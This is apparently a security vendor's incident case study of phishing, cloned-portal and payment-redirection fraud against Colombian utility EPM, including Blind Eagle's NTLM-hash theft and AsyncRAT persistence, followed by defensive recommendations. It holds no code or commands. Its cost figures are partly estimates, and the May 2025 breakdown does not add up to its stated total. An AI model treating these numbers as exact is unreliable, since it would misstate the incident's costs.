Incident Snapshot

Timeline of Key Events.

June 14, 2024 – Massive Clone of “Factura Web” Portal

On the night of June 14, 2024, EPM discovered that cybercriminals had created a near-perfect clone of its official billing site (facturaweb.epm.com.co). When customers entered their contract numbers, the cloned site showed the correct billing amount and due date, but payment details were redirected to mule accounts controlled by the attackers. EPM confirmed the impersonation on June 15 and immediately warned users to only pay through the official website, the "EPM Estamos Ahí" app, or the printed invoice QR code.

December 23, 2024 – Holiday “Gift” Scam via WhatsApp and SMS

By late 2024, a new scam spread rapidly. WhatsApp and SMS messages promised “Christmas gifts” and COP 49,000 refunds for service surcharges. Victims were directed to a fake microsite that requested their contract number and card information. On December 23, EPM issued a public notice warning customers that the messages were fraudulent and urged them to manually enter the official URL. Hundreds of complaints flooded EPM's call center over the holidays, prompting an official bulletin.

April – May 2025: Advanced Spoofing and Suspected Internal Breach

On May 23, 2025, another large-scale incident emerged. Customers who accessed the legitimate facturaweb.epm.com.co site reported being redirected to third-party accounts, losing up to COP 500,000 (~US $130) while believing they were still on the official platform. EPM disabled all online payment channels — website, app billing module, and WhatsApp payments — on May 24 and instructed users to pay in person until the threat was removed.

Several victims claimed they had accessed the site directly from saved bookmarks, suggesting a possible back-end compromise rather than simple domain impersonation. Tech forums speculated that malicious code may have been injected into EPM’s payment scripts, allowing legitimate transactions to be rerouted without altering the visible URL.

Parallel APT Pressure by Blind Eagle (Spring 2025)

Simultaneously, intelligence agencies reported that the Colombian APT group APT-C-36 (“Blind Eagle”) targeted public utilities in March–April 2025. They distributed malicious. URL attachments exploiting CVE-2024-43451 (an NTLM hash leak vulnerability) to exfiltrate VPN and helpdesk credentials. Once hash exchange was successful, AsyncRAT implants were delivered via GitHub to maintain persistence in EPM’s network.

 

Attack Tactics and Techniques (MITRE ATT&CK Summary)

  1. Brand Spoofing: Threat actors registered lookalike domains (typosquatting) and replicated EPM’s CSS, logos, and user flows to create indistinguishable fake portals.
  2. Phishing via Malicious Links: Paid ads on Instagram/Facebook (June 2024) and mass WhatsApp/SMS messages (December 2024) led users to credential-harvesting sites.
  3. Credential Theft via Fake Forms: Cloned pages included forms collecting contract numbers, card details, and billing credentials with no legitimate encryption.
  4. NTLM Exfiltration and Spear Phishing:  APT-C-36 sent .URL files that exfiltrated NTLMv2 hashes once opened. AsyncRAT was deployed to retain remote access.
  5. Persistence Through Legitimate Tools: AsyncRAT created registry run keys and scheduled tasks to reconnect with C2 servers even if users logged out.
  6. Monetization via Payment Redirection:
Funds intended for utility bills were diverted to attacker-controlled accounts, then laundered via microtransactions or digital services.

 

Operational and User Impact

  • Customer Losses: In June 2024, thousands unknowingly accessed cloned portals. Local banks reported tens of thousands of payment attempts redirected to fraud accounts. Hundreds of families lost between COP 100,000 and 500,000 each, triggering panic and a flood of support calls.
  • Digital Channel Disruption:
EPM disabled online payments for two days in June 2024, and again from May 24–30, 2025. Over 1.2 million users had to pay in person or through bank correspondents. The May 2025 disruption alone resulted in a 35% drop in daily collections (~US $3M/day) due to waived late fees and processing delays.
  • Support Overload and Reputational Damage:
EPM’s call center experienced a 400% spike in call volume within 48 hours of each phishing wave. By July 2025, user trust had dropped: only 62% felt “safe” using EPM’s digital platforms vs. 89% before June 2024.
  • Regulatory Scrutiny:
After the June 2024 incident, Colombia’s SIC opened an investigation into EPM’s cybersecurity controls. In January 2025, the national energy regulator requested evidence of improved billing portal defenses.

 

Estimated Financial Costs

Below are the main cost categories, drawn from public statements and standard industry estimates.

  • June 2024 Wave ("Factura Web" Clone):

    • Customer payments diverted: ~COP 900M (≈ US $230K)
    • Incident response and forensics: COP 2.3B (≈ US $580K)
    • Lost digital revenue (2-day disruption): COP 1.4B (≈ US $350K)
    • Customer support and goodwill credits: COP 900M (≈ US $230K)
    • CEstimated total (June 2024): COP 5.5B (≈ US $1.4M)

 

  • December 2024 – March 2025 (Holiday scams & minor incidents):
    • Payments diverted via WhatsApp/SMS: ~COP 400M (≈ US $100K)
    • Prevention and communications: COP 200M (≈ US $50K)
    • Expanded support operations: COP 350M (≈ US $90K)
    • Estimated total (Holiday wave): COP 950M (≈ US $240K)

 

  • May 2025 Wave (Suspected backend breach)
    • Payments diverted: ~COP 250M (≈ US $65K)
    • Incident response and investigation: COP 3.2B (≈ US $800K)
    • Lost digital revenue (6-day outage): COP 7.2B (≈ US $1.8M)
    • Customer compensation: COP 700M (≈ US $175K)
    • Estimated total (May 2025): COP 11.35B (≈ US $2.3M)

Total cost (18-month period): COP 17.8B (≈ US $4M). This excludes reputational damage and potential future regulatory fines.

 

Lessons Learned and Defensive Recommendations

  1. Treat the billing portal as critical infrastructure: Host Factura Web on an isolated architecture with MFA between server layers. Deploy a Web Application Firewall (WAF), perform checksum-based file integrity monitoring, and continuously scan third-party libraries (e.g., for CVE-2024-43451).
  2. Ongoing domain and brand monitoring: Scan DNS records and social networks before peak billing periods (end of month, government subsidies, holidays). Coordination with Meta and Google reduced fake-site traffic by ~30% in June 2024.
  3. Automated communication and alerts: Automated communication and alerts A single social media bulletin in December 2024 reduced malicious clicks by one-third in 48 hours. Automate SMS and WhatsApp alerts when new phishing domains are detected.
  4. Tokenized e-billing with MFA:Colombia’s Resolution 008 of 2024 on e-billing should be leveraged to implement one-time-use tokens tied to national ID numbers. This prevents attackers from paying with just a contract number.
  5. Strengthen cyber intelligence and APT response: Blind Eagle’s NTLM theft highlights that public utilities are high-value targets. Invest in a dedicated SOC with CISA-certified analysts and deploy EDR across all critical servers.
  6. Secure third-party ecosystems and isolated payment environments: Since attackers exploited compromised WordPress/Joomla sites and injected code in 2025, regularly audit all CMS and host payment services in an isolated, hardened environment.

 

Conclusion

EPM’s trajectory—from a simple cloned portal in June 2024 to a suspected backend breach in May 2025—reveals a broader Latin American reality: public utilities are high-value targets, and threat actors iterate at startup speed. What began as basic typosquatting turned into a six-day billing blackout and a sophisticated NTLM hash theft campaign by Blind Eagle.

For any Latin American organization—especially those delivering essential services—the imperative is clear: assume your portals and brand are already under attack and act with urgency measured in hours, not weeks. Ongoing domain takedowns, robust email authentication (SPF/DKIM/DMARC), hardened legacy protocols (disabling automatic .URL/.SCF launches), and strict third-party governance are the foundations of a defense that keeps the lights on and customer trust intact.

EPM’s story is not unique. Discover how this pattern of fraud is repeating across critical infrastructure providers—and how Centurio International is helping contain its spread and protect victims.